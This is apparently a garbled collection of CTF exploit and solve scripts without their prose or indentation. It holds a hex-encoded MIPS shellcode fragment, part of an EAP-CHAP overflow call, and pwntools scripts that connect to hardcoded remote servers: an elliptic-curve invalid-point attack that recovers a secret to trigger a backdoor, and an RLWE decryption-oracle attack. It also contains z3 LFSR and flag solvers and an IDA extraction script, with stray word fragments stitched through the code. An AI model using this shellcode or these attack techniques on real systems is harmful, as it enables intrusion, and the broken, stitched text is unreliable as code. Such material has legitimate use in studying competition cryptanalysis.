"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\xb8\
\x28\\x42\\x00Saaaaaaaaaaaaaaaaaaaaaaa\\x10\\x00\\x31\\x26\\x09\\xf8\\x20\\
x02\\x00\\x00\\x00\\x00\\x34\\xc7\\x43\\x00"
"\\x00\\x00\\x09\\x24\\x04\\x00\\xa9\\xaf\\x61\\x67\\x09\\x3c\\x66\\x6c\\x2
9\\x35\\x00\\x00\\xa9\\xaf\\xa5\\x0f\\x02\\x24\\x00\\x00\\xa4\\x27\\x26\\x2
8\\xa5\\x00\\x26\\x30\\xc6\\x00\\x0c\\x01\\x01\\x01"
"\\x25\\x20\\x40\\x00\\xa3\\x0f\\x02\\x24\\x4a\\x00\\x05\\x3c\\x30\\x59\\xa
5\\x34\\x00\\x01\\x06\\x24\\x0c\\x01\\x01\\x01"
"\\x04\\x00\\x04\\x24\\x4a\\x00\\x05\\x3c\\x30\\x59\\xa5\\x34\\x00\\x01\\x0
6\\x24\\x42\\x00\\x11\\x3c\\x98\\x66\\x31\\x36\\x09\\xf8\\x20\\x02\\x00\\x0
0\\x00\\x00";
eap_chap_response(esp, id, hash,sc,1024);
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
from gmpy2 import invert
from Crypto.Util.number import bytes_to_long, long_to_bytes
from sympy.ntheory.modular import crt
import os, sys, IPython, string, itertools, hashlib
q = 0xdd7860f2c4afe6d96059766ddd2b52f7bb1ab0fce779a36f723d50339ab25bbd
a = 0x4cee8d95bb3f64db7d53b078ba3a904557425e2a6d91c5dfbf4c564a3f3619fa
b = 0x56cbc73d8d2ad00e22f12b930d1d685136357d692fa705dae25c66bee23157b8
zero = (0, 0)
Px = 0xb55c08d92cd878a3ad444a3627a52764f5a402f4a86ef700271cb17edfa739ca
Py = 0x49ee01169c130f25853b66b1b97437fb28cfc8ba38b9f497c78f4a09c17a7ab2
P = (Px,Py)
def add(p1,p2):
if p1 == zero:
return p2
if p2 == zero:
return p1
(p1x,p1y),(p2x,p2y) = p1,p2
if p1x == p2x and (p1y != p2y or p1y == 0):
return zero
if p1x == p2x:
tmp = (3 * p1x * p1x + a) * invert(2 * p1y , q) % q
else:
tmp = (p2y - p1y) * invert(p2x - p1x , q) % q
x = (tmp * tmp - p1x - p2x) % q
y = (tmp * (p1x - x) - p1y) % q
return (int(x),int(y))
def mul(n,p):
r = zero
tmp = p
while 0 < n:
if n & 1 == 1:
r = add(r,tmp)
n, tmp = n >> 1, add(tmp,tmp)
return r
def pad(m):
pad_length = q.bit_length()*2 - len(m)
for _ in range(pad_length):
m.insert(0,0)
return m
def pointToKeys(p):
x = p[0]
y = p[1]
tmp = x << q.bit_length() | y
res = pad([int(i) for i in list('{0:0b}'.format(tmp))])
return res
def keyToPoint(key):
tmp = int(''.join(map(str, key)), 2)
y = tmp & (pow(2, 256) - 1)
x = (tmp >> 256) & (pow(2, 256) - 1)
return (x,y)
points = [
(5,
(20808069300207100183274602530191091934616421500415559983001767812694046383
293,
205593533380364858919179887976362111823835169213352520688714369824668942387
99)),
(89,
(87321197774501402310611885646409219233795421054641609481828830143175436651
426,
466901930452622329561575516950396108824380557309666285159726370609695633098
66)),
(2,
(49178099549835497496092804753081995271929547140019044050868855365390396807
836, 0)),
(7,
(86146125282727845562122226604071938057523980421707149246250725876033942274
93,
609992767480026417689321454484904371833589903739705135319750635137732064090
4)),
(11,
(51008778008673391062497828469861484466455044069701244145183958073802135538
658,
523433306740675935540021627692970148392381525757330265483984680836483463119
80)),
(17,
(14696750475467784215169583906294161001133971866462370789734677852973205374
217,
702465782501689885770595350012155579708865917561659059989847941443457667273
15)),
(19,
(20895542366258576140632165340163552561554430495525835251523963420841741236
644,
702710495281948662967752762409690723588115265112135239149902396584333241952
12)),
(223,
(33915843799094333545554760659572845786178346115436807542504557673181864481
403,
496193865490573898152627935104552519289867136829657828136701627350465842020
2)),
(3,
(84159891687508767784026420571706691065873921130895443950475386340963761964
016,
745464686396890700449543179178778284965321583786981689325117112513564526209
93)),
(8581,
(33470372169722734937128117413340606305226550585578400687548265866353883215
651,
583200267526644323386002397543215794981309016937526660817964540265575876768
24)),
(227,
(53608699644750835070492818729380419704224865129289968798986184002645439121
998,
971257473632407019758389332199205445283596318002726783386281299455089400359
78)),
(8447,
(91461460792106566534049350033727180613118157473575961398494732841092332598
98,
245899081922952781103828053653015885442578846319094688759479418276390624041
03)),
(107,
(10708673094034428846451419778167116988108408887215111563502121984160818926
680,
540940274764874433991431322818795342817961308123430370723207675122305455776
91)),
(2269,
(59490645943475047361814592639777918222484133262003124538378640652564408139
893,
899111636101348202622757143973336852737072896753238815552429362242772211055
77)),
(13,
(50813247780009476667181506340087720219076836217815846031916183043035364576
269,
357033227656861457728814039743338076894256570399589467598647703548262338340
99)),
(23,
(94030407960330960258634236781257559344753015811842769908656144906988258881
646,
107088554210599034415822197381758351880260871923685922578737098087178089453
01)),
(53,
(28609374879136662262288951682501353664111476201357383021243326520404502764
731,
470359424505844092825047652642106098535354290293352253338840741736328607075
17)),
(8887,
(59862301912251085345514763921816766523276663413662381298623422582341001672
108,
517778937344421532148965870396046323328281875697034465485876495287175682751
38)),
(337,
(19516183542063049445556856824103689173030070209813461115077216334013878038
397,
220877224948131685466703202006055509342223114271166584633504894854821961652
23)),
(5273,
(46348766474975820016718266202930612934374051650124311390712813326347869618
956,
357187448952316551560501835133903700759668019241793600484104706039837111774
55)),
(457,
(30109681826650770286832804444641171785449647086753924059170517664271518614
827,
427218644008791110840306959982199202585623413567722031917673667520948523029
35)),
(97,
(30230760885355357028719810962776948731510346336167684991841989772111980127
180,
908083636995400777848723738635334629181428633007583682331338440848496946454
77)),
(61,
(48775176294425274397879979550080275719919880113341178907151427600493536960
627,
321508202506718409037080400721427897194114074269054785284327832233630148692
95)),
(1163,
(66477330604121050769013664729461625332682836650615614624502258541300122444
486,
764020246007025389610712741008146858925720736814645258126775367652095445072
20)),
(367,
(49457425324598317599371211071689905886052889524828363188073867801883975888
819,
212621422477412515160004960779907136425757470558448422296053797400140394907
94)),
(2437,
(37297992015356349674637948601585772480716755197390682409511710065255051579
542,
707811146390953038497617025598326142658888021707420570843109445370130832860
84)),
(101,
(28423340852526200965655481757396237023197853930861537730403272121847513924
513,
109936345924795138329877192922107557825598875221490339194468352183360454696
33)),
(151,
(52082500934393047346970576494959415331069044619992184425877193608577445858
090,
193597290919150535329159319354339256481883289440324982878831719606752839182
13)),
(31,
(73326511909561687017146161003307111348328563924138852967496777244860812321
894,
281871501939047756026148723580356175682835635155993764731841571456267480841
24)),
(421,
(88231861210801154619386577714504494873793095049745757100871455558575328268
749,
504632716002732888188256343547425284921054997216288077475575685478396955857
79)),
(1259,
(34644564331339325559781816842729097921723585148199343494313771565855696117
779,
698779366785443080949114924188664977697178444153574587258155516617846330104
15)),
(113,
(38684243678749317793538570032754907885148668563586870969703084073294273083
982,
139414435860418342968844029406658220789106955841536367237824869423284730699
12)),
(1951,
(64928218519313583048384354505976338917616160372255399856516445739398114103
650,
750610435694423408847399030741170182449145424849243064262109663786954044779
11)),
(29,
(58350618667584117674116437768708112039669824287965657944330308328202151581
589,
609773958596478582938995660570349864254655165062858184340490081458046893617
46)),
(137,
(25924257763770933028812366971220965113585654190895574879017131465236702246
901,37488570461956678061061276427985993923637049856207858380548225051724829
63475)),
(41,
(55855642312890484594663105436603344407671229062335797868365105959306536597
147,
707082564620419755510422929861906159448045297094354530229052251546632442962
11)),
(127,
(28622122589312150132093528303919276455398830314700482306493152171110867066
704,
895404899170499409718627775173893799007960225076042364516015837788266331321
22)),
]
# sanity check
Sigma = 1
for order, point in points:
Sigma *= order
assert mul(order, point) == zero
assert Sigma > order
#p = remote("localhost", 8848)
p = remote("134.175.225.42", 8848)
def exchange(x,y,first=False):
if not first:
p.sendlineafter('choice:', 'Exchange')
p.sendlineafter('X:', str(x))
p.sendlineafter('Y:', str(y))
def getkey():
p.sendlineafter('choice:', 'Encrypt')
p.sendlineafter('(hex):', 'f' * 128)
p.recvuntil('is:\n')
result = bytes_to_long(p.recvline().strip().decode('hex'))
key = [0] * 512
for i in reversed(range(512)):
key[i] = (result & 1) ^ 1
result >>= 1
return key
def backdoor(s):
p.sendlineafter('choice:', 'Backdoor')
p.sendlineafter('secret:', str(s))
def proof_of_work(chal, h):
for comb in itertools.product(string.ascii_letters + string.digits,
repeat=4):
if hashlib.sha256(''.join(comb) + chal).hexdigest() == h:
return ''.join(comb)
raise Exception("Not found...")
p.recvuntil("+")
chal = p.recvuntil(')',drop=True)
p.recvuntil(' == ')
h = p.recvline().strip()
NLFSR
work = proof_of_work(chal, h)
p.sendlineafter("XXXX:", work)
M = []
N = []
for i in xrange(len(points)):
exchange(points[i][1][0], points[i][1][1], True if i == 0 else False)
key = getkey()
Qp = keyToPoint(key)
Pp = points[i][1]
for o in xrange(points[i][0]):
Rp = mul(o, Pp)
if Rp[0] == Qp[0] and Rp[1] == Qp[1]:
M.append(points[i][0])
N.append(o)
break
else:
print 'Not found for order %d....' % points[i][0]
break
secret, _ = crt(M, N)
print secret
backdoor(secret)
p.interactive()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import z3
data = open("./data", 'rb').read()
class LFSR(object):
def __init__(self, init, mask):
self.init = init
self.mask = mask
self.lmask = 0xffffff
def next(self):
nextdata = (self.init << 1) & self.lmask
i = self.init & self.mask & self.lmask
output = 0
for j in xrange(self.lmask.bit_length()):
output ^= z3.LShR(i, j) & 1
#output ^= (i >> j) & 1
Homomorphic
self.init = nextdata ^ output
return output & 1
def lfsr(r, m): return ((r << 1) & 0xffffff) ^ (bin(r & m).count('1') % 2)
s = z3.Solver()
a = z3.BitVec('a', 24)
b = z3.BitVec('b', 24)
c = z3.BitVec('c', 24)
d = z3.BitVec('d', 24)
'''
s.add(a <= pow(2, 19) - 1)
s.add(a >= pow(2, 18))
s.add(b <= pow(2, 19) - 1)
s.add(b >= pow(2, 18))
s.add(c <= pow(2, 13) - 1)
s.add(c >= pow(2, 12))
s.add(d <= pow(2, 6) - 1)
s.add(d >= pow(2, 5))
'''
ma, mb, mc, md = 0x505a1, 0x40f3f, 0x1f02, 0x31
la, lb, lc, ld = LFSR(a, ma), LFSR(b, mb), LFSR(c, mc), LFSR(d, md)
def combine():
ao, bo, co, do = la.next(), lb.next(), lc.next(), ld.next()
return (ao * bo) ^ (bo * co) ^ (bo * do) ^ co ^ do
def combine_lfsr():
global a, b, c, d
a = lfsr(a, ma)
b = lfsr(b, mb)
c = lfsr(c, mc)
d = lfsr(d, md)
[ao, bo, co, do] = [i & 1 for i in [a, b, c, d]]
return (ao*bo) ^ (bo*co) ^ (bo*do) ^ co ^ do
for x in data[:56]:
s.add(combine() == int(x))
print s.check()
m = s.model()
print m
#!/usr/bin/env sage
import os
os.environ['TERM'] = 'screen'
from sage.stats.distributions.discrete_gaussian_integer import
DiscreteGaussianDistributionIntegerSampler
from pwn import *
import IPython, ast, string, itertools
q = 2^54
t = 2^8
d = 2^10
delta = int(q/t)
PR.<x> = PolynomialRing(ZZ)
DG = DiscreteGaussianDistributionIntegerSampler(sigma=1)
fx = x^d + 1
Q.<X> = PR.quotient(fx)
def sample(r):
return Q([randint(0,r) for _ in range(d)])
def genError():
return Q([DG() for _ in range(d)])
def Round(a,r):
A = a.list()
for i in range(len(A)):
A[i] = (A[i]%r) - r if (A[i]%r) > r/2 else A[i]%r
return Q(A)
def genKeys():
s = sample(1)
a = Round(sample(q-1),q)
e = Round(genError(),q)
pk = [Round(-(a*s+e),q),a]
return s,pk
def encrypt(pk,m):
u = sample(1)
e1 = genError()
e2 = genError()
c1 = Round(pk[0]*u + e1 + delta*m,q)
c2 = Round(pk[1]*u + e2,q)
return (c1,c2)
def decrypt(s,c):
c0 = Q([i for i in c[0]])
c1 = Q([i for i in c[1]])
data = (t * Round(c0 + c1*s,q)).list()
for i in range(len(data)):
data[i] = round(data[i]/q)
data = Round(Q(data),t)
return data
#p = remote('localhost', 8848)
p = remote('106.52.180.168', 8848)
def proof_of_work(chal, h):
for comb in itertools.product(string.ascii_letters + string.digits,
repeat=4):
if hashlib.sha256(''.join(comb) + chal).hexdigest() == h:
return ''.join(comb)
raise Exception("Not found...")
p.recvuntil("+")
chal = p.recvuntil(')',drop=True)
p.recvuntil(' == ')
h = p.recvline().strip()
work = proof_of_work(chal, h)
p.sendlineafter("XXXX:", work)
pk = []
p.recvuntil('pk0: ')
pk.append(Q(ast.literal_eval(p.recvline().strip())))
p.recvuntil('pk1: ')
pk.append(Q(ast.literal_eval(p.recvline().strip())))
flags = []
p.recvuntil('is: \n')
for i in xrange(44):
ct = []
for j in xrange(2):
ct.append(Q(ast.literal_eval(p.recvline().strip())))
flags.append(ct)
def decrypt(c,index):
c0, c1 = c
p.sendlineafter('choice:', 'Decrypt')
p.sendlineafter('commas):', str(c0.list()).replace('[', '').replace(']',
'').replace(' ', ''))
p.sendlineafter('commas):', str(c1.list()).replace('[', '').replace(']',
'').replace(' ', ''))
p.sendlineafter('index:', str(index))
p.recvuntil('is: \n')
return ZZ(p.recvline().strip())
msg100 = encrypt(pk, 0x100)
Re
/little elves
elfoverlapida
Flag0x2c
Trace
44bytesflag44
z3
f = ''
for i in xrange(len(f), 44):
tm = (msg100[0] + flags[i][0], msg100[1] + flags[i][1])
target = decrypt(tm, 0)
f += chr(target)
print f
p.interactive()
cmps = []
datas = []
ea = 0x888099
while (ea < 0x8896e1):
ea = FindCode(ea, SEARCH_DOWN | SEARCH_NEXT)
if (GetMnem(ea) == 'call'):
print hex(ea)
ea1 = ea
cmp_addr = ea
for i in xrange(3):
cmp_addr = FindCode(cmp_addr, SEARCH_UP | SEARCH_NEXT)
cmp_val = int(GetOpnd(cmp_addr, 1).strip('h'), 16)
print hex(cmp_val)
cmps.append(cmp_val)
ea = int(GetOpnd(ea, 0)[-6:], 16)
data_addr = ea1 + 0x5
print hex(data_addr)
data = []
for i in xrange(44):
data.append(Byte(data_addr + i))
datas.append(data)
#print hex(ea)
z3
print cmps
print datas
cmps = [200, 201, 204, 116, 124, 94, 129, 127, 211, 85, 61, 154, 50, 51,
27, 28, 19, 134, 121, 70, 100, 219, 1, 132, 93, 252, 152, 87, 32, 171, 228,
156, 43, 98, 203, 2, 24, 63, 215, 186, 201, 128, 103, 52]
datas = [[166, 8, 116, 187, 48, 79, 49, 143, 88, 194, 27, 131, 58, 75, 251,
195, 192, 185, 69, 60, 84, 24, 124, 33, 211, 251, 140, 124, 161, 9, 44,
208, 20, 42, 8, 37, 59, 147, 79, 232, 57, 16, 12, 84], [73, 252, 81, 126,
50, 87, 184, 130, 196, 114, 29, 107, 153, 91, 63, 217, 31, 191, 74, 176,
208, 252, 97, 253, 55, 231, 82, 169, 185, 236, 171, 86, 208, 154, 192, 109,
255, 62, 35, 140, 91, 49, 139, 255], [57, 18, 43, 102, 96, 26, 50, 187,
129, 161, 7, 55, 11, 29, 151, 219, 203, 139, 56, 12, 176, 160, 250, 237, 1,
238, 239, 211, 241, 254, 18, 13, 75, 47, 215, 168, 149, 154, 33, 222, 77,
138, 240, 42], [96, 198, 230, 11, 49, 62, 42, 10, 169, 77, 7, 164, 198,
241, 131, 157, 75, 147, 201, 103, 120, 133, 161, 14, 214, 157, 28, 220,
165, 232, 20, 132, 16, 79, 9, 1, 33, 194, 192, 55, 109, 166, 101, 110],
[108, 159, 167, 183, 165, 180, 74, 194, 149, 63, 211, 153, 174, 97, 102,
123, 157, 142, 47, 30, 185, 209, 57, 108, 170, 161, 126, 248, 206, 238,
140, 105, 192, 231, 237, 36, 46, 185, 123, 161, 97, 192, 168, 129], [72,
18, 132, 37, 37, 42, 224, 99, 92, 159, 95, 27, 18, 172, 43, 251, 97, 44,
238, 106, 42, 86, 124, 1, 231, 63, 99, 147, 239, 180, 217, 195, 203, 106,
21, 4, 238, 229, 43, 232, 193, 31, 116, 213], [17, 133, 116, 7, 57, 79, 20,
19, 197, 146, 5, 40, 103, 56, 135, 185, 168, 73, 3, 113, 118, 102, 210, 99,
29, 12, 34, 249, 237, 132, 57, 71, 44, 41, 1, 65, 136, 112, 20, 142, 162,
232, 225, 15], [224, 192, 5, 102, 220, 42, 18, 221, 124, 173, 85, 87, 112,
175, 157, 72, 160, 207, 229, 35, 136, 157, 229, 10, 96, 186, 112, 156, 69,
195, 89, 86, 238, 167, 169, 154, 137, 47, 205, 238, 22, 49, 177, 83], [234,
233, 189, 191, 209, 106, 254, 220, 45, 12, 242, 132, 93, 12, 226, 51, 209,
114, 131, 4, 51, 119, 117, 247, 19, 219, 231, 136, 251, 143, 203, 145, 203,
212, 71, 210, 12, 255, 43, 189, 148, 233, 199, 224], [5, 62, 126, 209, 242,
136, 95, 189, 79, 203, 244, 196, 2, 251, 150, 35, 182, 115, 205, 78, 215,
183, 88, 246, 208, 211, 161, 35, 39, 198, 171, 152, 231, 57, 44, 91, 81,
58, 163, 230, 179, 149, 114, 105], [72, 169, 107, 116, 56, 205, 187, 117,
2, 157, 39, 28, 149, 94, 127, 255, 60, 45, 59, 254, 30, 144, 182, 156, 159,
26, 39, 44, 129, 34, 111, 174, 176, 230, 253, 24, 139, 178, 200, 87, 44,
71, 67, 67], [5, 98, 151, 83, 43, 8, 109, 58, 204, 250, 125, 152, 246, 203,
135, 195, 8, 164, 195, 69, 148, 14, 71, 94, 81, 37, 187, 64, 48, 50, 230,
165, 20, 167, 254, 153, 249, 73, 201, 40, 106, 3, 93, 178], [104, 212, 183,
194, 181, 196, 225, 130, 208, 159, 255, 32, 91, 59, 170, 44, 71, 34, 99,
157, 194, 182, 86, 167, 148, 206, 237, 196, 250, 113, 22, 244, 100, 185,
47, 250, 33, 253, 204, 44, 191, 50, 146, 181], [143, 5, 236, 210, 136, 80,
252, 104, 156, 100, 209, 109, 103, 134, 125, 138, 115, 215, 108, 155, 191,
160, 228, 183, 21, 157, 225, 61, 89, 198, 250, 57, 189, 89, 205, 152, 184,
86, 207, 72, 65, 20, 209, 155], [103, 51, 118, 167, 111, 152, 184, 97, 213,
190, 175, 93, 237, 141, 92, 30, 82, 136, 16, 212, 99, 21, 105, 166, 161,
214, 103, 21, 116, 161, 148, 132, 95, 54, 60, 161, 207, 183, 250, 45, 156,
81, 208, 15], [150, 65, 4, 37, 202, 4, 54, 106, 113, 55, 51, 181, 225, 120,
173, 61, 251, 42, 153, 149, 88, 160, 79, 197, 204, 20, 65, 79, 165, 85,
203, 193, 203, 97, 9, 142, 53, 50, 127, 193, 225, 11, 121, 148], [99, 27,
20, 52, 248, 197, 117, 210, 216, 249, 122, 48, 225, 117, 211, 2, 33, 172,
60, 140, 84, 44, 71, 187, 160, 198, 26, 100, 162, 92, 89, 181, 82, 55, 184,
152, 112, 51, 248, 255, 205, 145, 31, 137], [209, 78, 219, 94, 189, 146,
92, 172, 214, 106, 122, 121, 90, 60, 174, 6, 82, 28, 166, 206, 248, 86, 28,
113, 159, 183, 196, 12, 183, 146, 225, 107, 169, 128, 67, 221, 228, 244,
212, 66, 118, 136, 162, 218], [163, 143, 112, 123, 98, 87, 0, 143, 198,
176, 196, 246, 231, 201, 157, 169, 244, 123, 106, 210, 50, 159, 47, 55, 28,
203, 235, 91, 74, 16, 175, 125, 53, 54, 82, 2, 112, 159, 122, 251, 118,
138, 120, 184], [187, 81, 128, 55, 221, 223, 44, 37, 166, 168, 32, 169, 22,
255, 169, 251, 101, 158, 161, 153, 89, 1, 244, 87, 246, 237, 157, 232, 180,
3, 248, 23, 58, 162, 144, 159, 173, 28, 117, 196, 186, 225, 81, 83], [169,
45, 229, 173, 17, 248, 83, 201, 242, 38, 116, 201, 12, 87, 3, 231, 200,
143, 166, 63, 146, 86, 240, 197, 26, 198, 21, 34, 202, 192, 26, 188, 203,
3, 13, 238, 109, 179, 214, 146, 193, 255, 226, 189], [16, 63, 38, 178, 184,
25, 51, 81, 142, 189, 2, 37, 163, 244, 157, 193, 149, 21, 6, 215, 185, 13,
205, 56, 158, 45, 48, 243, 98, 248, 129, 223, 68, 111, 88, 62, 119, 28,
255, 243, 132, 238, 149, 75], [185, 141, 49, 173, 86, 9, 150, 99, 183, 114,
226, 133, 170, 2, 65, 124, 2, 164, 2, 155, 153, 89, 109, 220, 138, 127,
150, 213, 114, 6, 151, 227, 248, 172, 28, 0, 92, 63, 41, 229, 214, 120, 49,
164], [242, 48, 147, 252, 204, 89, 111, 168, 251, 136, 160, 106, 5, 155,
137, 198, 250, 250, 57, 180, 252, 118, 165, 21, 254, 155, 154, 247, 242,
217, 131, 65, 35, 207, 112, 77, 209, 176, 122, 192, 147, 107, 80, 37], [52,
183, 251, 29, 226, 175, 39, 75, 34, 254, 233, 96, 155, 144, 9, 254, 189,
41, 169, 184, 91, 97, 87, 88, 251, 138, 114, 118, 91, 156, 198, 75, 222,
19, 183, 52, 81, 194, 144, 13, 249, 111, 3, 73], [21, 107, 222, 106, 222,
98, 190, 4, 244, 225, 112, 133, 120, 253, 141, 48, 52, 154, 63, 235, 190,
78, 33, 209, 4, 172, 158, 187, 219, 151, 17, 233, 214, 32, 120, 38, 26, 0,
250, 129, 251, 40, 89, 39], [25, 66, 117, 107, 200, 80, 88, 90, 24, 176,
247, 95, 59, 121, 118, 67, 56, 133, 145, 167, 24, 46, 180, 145, 128, 220,
200, 29, 172, 157, 100, 9, 97, 253, 8, 200, 52, 229, 147, 218, 254, 255,
182, 170], [172, 79, 214, 26, 85, 230, 228, 223, 32, 227, 84, 74, 109, 209,
222, 45, 48, 66, 23, 197, 52, 212, 179, 184, 90, 149, 199, 128, 153, 70, 3,
73, 160, 39, 49, 165, 88, 252, 135, 9, 157, 140, 32, 33], [72, 233, 196,
173, 35, 166, 146, 186, 61, 86, 64, 42, 25, 86, 66, 93, 12, 255, 63, 83,
95, 219, 108, 152, 205, 31, 238, 77, 74, 156, 149, 228, 68, 244, 178, 78,
181, 173, 251, 248, 185, 99, 181, 205], [106, 86, 224, 51, 91, 194, 158,
83, 144, 77, 217, 95, 125, 119, 144, 47, 85, 220, 24, 40, 59, 77, 70, 190,
188, 20, 105, 150, 79, 85, 194, 168, 64, 215, 234, 226, 4, 99, 157, 0, 186,
74, 18, 94], [36, 23, 51, 78, 191, 254, 1, 166, 174, 62, 222, 243, 131,
207, 37, 4, 199, 35, 169, 7, 216, 42, 190, 241, 120, 11, 166, 129, 117, 93,
184, 50, 237, 84, 122, 67, 250, 248, 60, 96, 117, 91, 187, 79], [248, 17,
173, 127, 98, 184, 11, 20, 50, 140, 249, 248, 24, 222, 34, 86, 71, 0, 237,
138, 148, 107, 115, 104, 62, 191, 39, 221, 123, 115, 131, 229, 127, 56, 64,
177, 106, 239, 26, 255, 100, 88, 1, 75], [144, 18, 85, 103, 3, 31, 157, 44,
67, 24, 228, 226, 82, 208, 69, 17, 189, 216, 205, 140, 6, 1, 33, 11, 61,
223, 12, 116, 123, 167, 151, 58, 167, 79, 96, 189, 151, 233, 92, 94, 22,
60, 254, 254], [216, 167, 82, 244, 143, 231, 192, 63, 79, 49, 131, 176,
212, 46, 141, 107, 125, 207, 201, 5, 103, 155, 107, 166, 210, 49, 182, 60,
34, 26, 220, 198, 225, 160, 57, 52, 138, 27, 247, 181, 0, 67, 1, 205], [19,
243, 215, 203, 156, 157, 71, 187, 142, 198, 244, 52, 100, 195, 129, 134,
38, 227, 155, 241, 122, 192, 145, 179, 195, 16, 180, 70, 86, 219, 250, 67,
127, 47, 178, 249, 19, 36, 183, 50, 154, 186, 239, 15], [163, 224, 95, 10,
171, 106, 49, 57, 28, 178, 119, 6, 40, 228, 92, 163, 93, 225, 23, 37, 24,
211, 72, 105, 209, 70, 0, 165, 70, 226, 43, 187, 167, 60, 143, 233, 207,
209, 12, 207, 64, 246, 222, 16], [245, 140, 237, 250, 89, 99, 215, 112, 85,
182, 51, 26, 62, 220, 116, 17, 196, 247, 172, 121, 22, 106, 91, 200, 115,
240, 31, 78, 47, 126, 50, 114, 109, 88, 83, 120, 17, 95, 198, 206, 71, 112,
172, 49], [254, 198, 189, 175, 121, 123, 248, 38, 163, 170, 91, 171, 125,
66, 94, 37, 181, 207, 13, 60, 210, 178, 252, 39, 175, 18, 106, 94, 171,
196, 182, 129, 101, 165, 103, 164, 234, 110, 146, 69, 36, 75, 58, 98],
[184, 162, 160, 24, 71, 214, 24, 14, 196, 222, 67, 178, 163, 150, 206, 104,
38, 176, 245, 98, 180, 213, 93, 134, 25, 198, 166, 10, 183, 99, 207, 127,
163, 10, 141, 105, 52, 68, 18, 121, 217, 209, 124, 127], [142, 153, 245,
130, 182, 55, 211, 250, 217, 10, 172, 119, 212, 171, 244, 99, 99, 41, 223,
221, 128, 66, 31, 129, 195, 145, 241, 50, 77, 139, 29, 232, 60, 167, 110,
139, 124, 135, 18, 197, 200, 85, 15, 159], [225, 159, 86, 55, 158, 137,
229, 250, 129, 194, 200, 31, 147, 30, 219, 233, 147, 28, 6, 219, 81, 172,
132, 162, 212, 115, 232, 60, 152, 105, 146, 77, 187, 9, 20, 191, 157, 96,
131, 190, 125, 175, 141, 4], [110, 75, 232, 58, 102, 13, 222, 137, 137, 14,
191, 155, 48, 100, 169, 184, 49, 249, 49, 39, 138, 124, 63, 73, 237, 150,
244, 126, 127, 206, 91, 252, 110, 45, 189, 116, 188, 42, 18, 68, 194, 244,
53, 2], [109, 116, 87, 241, 128, 121, 227, 188, 2, 6, 81, 194, 4, 225, 176,
48, 8, 59, 243, 50, 234, 228, 192, 176, 168, 187, 248, 244, 27, 188, 107,
204, 222, 202, 73, 141, 160, 139, 151, 206, 1, 227, 152, 81], [13, 149, 85,
158, 164, 119, 149, 36, 138, 84, 173, 132, 39, 230, 96, 229, 84, 218, 14,
153, 184, 98, 160, 129, 2, 161, 99, 41, 17, 114, 55, 67, 192, 102, 241,
168, 149, 191, 216, 18, 229, 153, 94, 171]]
print len(cmps)
print len(datas)
from z3 import *
s = Solver()
flag = [(BitVec('flag[%d]', 8) % i) for i in range(44)]
for xx in xrange(44):
bl = 0
for i in xrange(44):
cl = flag[i]
dl = datas[xx][i]
for j in xrange(8):
if (dl & 1):
bl ^= cl
if (cl & 0x80):
cl = (cl << 1) & 0xff
cl ^= 0x39
else:
cl = (cl << 1)
dl >>= 1
s.add(bl == cmps[xx])
s.check()
print s.model()
cmps = [200, 201, 204, 116, 124, 94, 129, 127, 211, 85, 61, 154, 50, 51,
27, 28, 19, 134, 121, 70, 100, 219, 1, 132, 93, 252, 152, 87, 32, 171, 228,
156, 43, 98, 203, 2, 24, 63, 215, 186, 201, 128, 103, 52]
datas = [[166, 8, 116, 187, 48, 79, 49, 143, 88, 194, 27, 131, 58, 75, 251,
195, 192, 185, 69, 60, 84, 24, 124, 33, 211, 251, 140, 124, 161, 9, 44,
208, 20, 42, 8, 37, 59, 147, 79, 232, 57, 16, 12, 84], [73, 252, 81, 126,
50, 87, 184, 130, 196, 114, 29, 107, 153, 91, 63, 217, 31, 191, 74, 176,
208, 252, 97, 253, 55, 231, 82, 169, 185, 236, 171, 86, 208, 154, 192, 109,
255, 62, 35, 140, 91, 49, 139, 255], [57, 18, 43, 102, 96, 26, 50, 187,
129, 161, 7, 55, 11, 29, 151, 219, 203, 139, 56, 12, 176, 160, 250, 237, 1,
238, 239, 211, 241, 254, 18, 13, 75, 47, 215, 168, 149, 154, 33, 222, 77,
138, 240, 42], [96, 198, 230, 11, 49, 62, 42, 10, 169, 77, 7, 164, 198,
241, 131, 157, 75, 147, 201, 103, 120, 133, 161, 14, 214, 157, 28, 220,
165, 232, 20, 132, 16, 79, 9, 1, 33, 194, 192, 55, 109, 166, 101, 110],
[108, 159, 167, 183, 165, 180, 74, 194, 149, 63, 211, 153, 174, 97, 102,
123, 157, 142, 47, 30, 185, 209, 57, 108, 170, 161, 126, 248, 206, 238,
140, 105, 192, 231, 237, 36, 46, 185, 123, 161, 97, 192, 168, 129], [72,
18, 132, 37, 37, 42, 224, 99, 92, 159, 95, 27, 18, 172, 43, 251, 97, 44,
238, 106, 42, 86, 124, 1, 231, 63, 99, 147, 239, 180, 217, 195, 203, 106,
21, 4, 238, 229, 43, 232, 193, 31, 116, 213], [17, 133, 116, 7, 57, 79, 20,
19, 197, 146, 5, 40, 103, 56, 135, 185, 168, 73, 3, 113, 118, 102, 210, 99,
29, 12, 34, 249, 237, 132, 57, 71, 44, 41, 1, 65, 136, 112, 20, 142, 162,
